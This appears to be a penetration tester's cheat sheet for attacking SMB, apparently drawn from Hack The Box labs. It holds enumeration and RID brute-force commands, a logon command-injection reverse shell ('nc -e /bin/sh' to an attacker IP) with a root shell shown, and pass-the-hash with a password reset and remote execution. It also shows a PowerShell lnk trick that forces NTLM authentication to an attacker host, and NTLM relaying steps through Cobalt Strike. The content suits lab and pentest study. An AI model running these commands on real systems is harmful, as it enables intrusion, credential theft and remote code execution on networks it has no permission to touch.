139, 445 - SMB

Enumeration

$ rpcclient -U "" 10.10.11.168
$ rpcclient -U ksimpson 10.10.11.168

$ smbclient -L 10.10.11.168
$ smbclient -U ksimpson -L 10.10.11.168
$ smbclient \\\\10.10.11.129\\RedirectedFolders$ -U edgar.jacobs

$ smbmap -H 10.10.11.168

$ crackmapexec smb 10.10.11.168 -u '' -p '' --shares
$ crackmapexec smb 10.10.11.129 -u tristan.davies -p ASDqwe123! -x 'type C:\Users\Administrator\Desktop\root.txt'

$ nbtscan -r 10.10.11.168

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Enumerate with rpcclient

# Server Info
Server info: srvinfo

# Users enumeration
List users: querydispinfo and enumdomusers
Get user details: queryuser <0xrid>
Get user groups: queryusergroups <0xrid>
GET SID of a user: lookupnames <username>
Get users aliases: queryuseraliases [builtin|domain] <sid>

# Brute-Force users RIDs
for i in $(seq 500 1100); do
    rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done

#Groups enumeration
List groups: enumdomgroups
Get group details: querygroup <0xrid>
Get group members: querygroupmem <0xrid>

#Aliasgroups enumeration
List alias: enumalsgroups <builtin|domain>
Get members: queryaliasmem builtin|domain <0xrid>

#Domains enumeration
List domains: enumdomains
Get SID: lsaquery
Domain info: querydominfo

#Shares enumeration
Enumerate all available shares: netshareenumall
Info about a share: netsharegetinfo <share>

#More SIDs
Find SIDs by name: lookupnames <username>
Find more SIDs: lsaenumsid
RID cycling (check more SIDs): lookupsids <sid>

RID vs SID

A Relative Identifier (RID) is a unique identifier (represented in hexadecimal format) utilized by Windows to track and identify objects.

• The SID for the NAME_DOMAIN.LOCAL domain is: S-1-5-21-1038751438-1834703946-36937684957.

• When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object.

• Domain user john with a RID:[0x457] Hex 0x457 = decimal 1111, will have a full user SID of: S-1-5-21-1038751438-1834703946-36937684957-1111.

Logon Reverse Shell

smb: > ? 
[..] 
wdel logon listconnect showconnect tcon

smb: > logon “./=nohup nc -e /bin/sh 10.10.14.10 4488” 
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT

$ nc -lvnp 4488 
listening on [any] 4488 … 
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.3] 58543 
whoami 
root

Setup local SMB Share

# Impacket
$ impacket-smbserver share . -smb2support

# Static share on host
$ sudo adduser --system shareuser
Adding system user `shareuser' (UID 130) ...
Adding new user `shareuser' (UID 130) with group `nogroup' ...
Creating home directory `/home/shareuser' ...

$ sudo mkdir share
$ sudo chmod 777 share
$ sudo chown -R shareuser:nogroup /srv/share
$ sudo vim /etc/samba/smb.conf
$ cat /etc/samba/smb.conf
[global]
   client min protocol = SMB2
   client max protocol = SMB3

[share]
  path = /srv/share
  writable = yes
  browsable = yes
  public = yes
  create mask = 0644
  directory mask = 0755
  force user = shareuser

$ service smbd restart

Download files Reclusively

smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\voids password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

\Dev
  .                                   D        0  Mon Oct 25 21:40:06 2021
  ..                                  D        0  Mon Oct 25 21:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 17:46:42 2021

\HelpDesk
  .                                   D        0  Mon Oct 25 17:48:42 2021
  ..                                  D        0  Mon Oct 25 17:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 16:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 16:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 16:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 16:57:44 2021

smb: \> prompt off
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (23.0 KiloBytes/sec) (average 23.0 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (3627.9 KiloBytes/sec) (average 2656.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (886.7 KiloBytes/sec) (average 2270.4 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (963.6 KiloBytes/sec) (average 1548.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (507.0 KiloBytes/sec) (average 1438.0 KiloBytes/sec)bas

PassTheHash (PTH) with pth-rpcclient

$ pth-rpcclient -U search.htb/BIR-ADFS-GMSA$%00000000000000000000000000000000:e1e9fd9e46d0d747e1595167eedcec0f //10.10.11.129
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
rpcclient $> setuserinfo2 tristan.davies 23 ASDqwe123!

$ crackmapexec smb 10.10.11.129 -u tristan.davies -p ASDqwe123! -x 'type C:\Users\Administrator\Desktop\root.txt'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\tristan.davies:ASDqwe123! (Pwn3d!)
SMB         10.10.11.129    445    RESEARCH         [+] Executed command 
SMB         10.10.11.129    445    RESEARCH         8ffdc3acd86000b9eb7ace10e0c0462a

Force NTLM Authentication (lnk file)

Windows Shortcuts: Creating a shortcut with the icon property pointing to a UNC path will trigger an NTLM authentication attempt when it's viewed in Explorer (it doesn't even have to be clicked).

$wsh = new-object -ComObject wscript.shell  
$shortcut = $wsh.CreateShortcut("\\dc-2\software\test.lnk")  
$shortcut.IconLocation = "\\10.10.17.231\test.ico"  
$shortcut.Save()

NTLM Relaying with Cobalt Strike

NTLM authentication uses a 3-way handshake between a client and server.

1. The client makes an authentication request to a server for a resource it wants to access.

2. The server sends a challenge to the client - the client needs to encrypt the challenge using the hash of their password.

3. The client sends the encrypted response to the server, which contacts a domain controller to verify the encrypted challenge is correct.

If on-premise a NTLM relay attack is usually quite trivial where we intercept or capture the first authentication request with tools like Responder and ntlmrelayx to impersonate the user.

However it's not as easy in an environment like this, where there are multiple network. Port 445 is always bound and in use by Windows - even local admins can't arbitrarily redirect traffic bound to this port or bind another tool to this port.

It's still possible to do with Cobalt Strike, but requires the use of multiple capabilities simultaneously.

1. Use a driver to redirect traffic destined for port 445 to another port (e.g. 8445) that we can bind to.

2. Use a reverse port forward on the port the SMB traffic is being redirected to. This will tunnel the SMB traffic over the C2 channel to our Team Server.

3. The tool of choice (ntlmrelayx) will be listening for SMB traffic on the Team Server.

4. A SOCKS proxy is required to allow ntlmrelayx to send traffic back into the target network.

The flow looks something like this:

PortBender is a reflective DLL and Aggressor script specifically designed to help facilitate this through Cobalt Strike. It requires local admin access in order for the driver to be loaded, and that the driver be located in the current working directory of the Beacon. It makes sense to use C:\Windows\System32\drivers since this is where most Windows drivers go.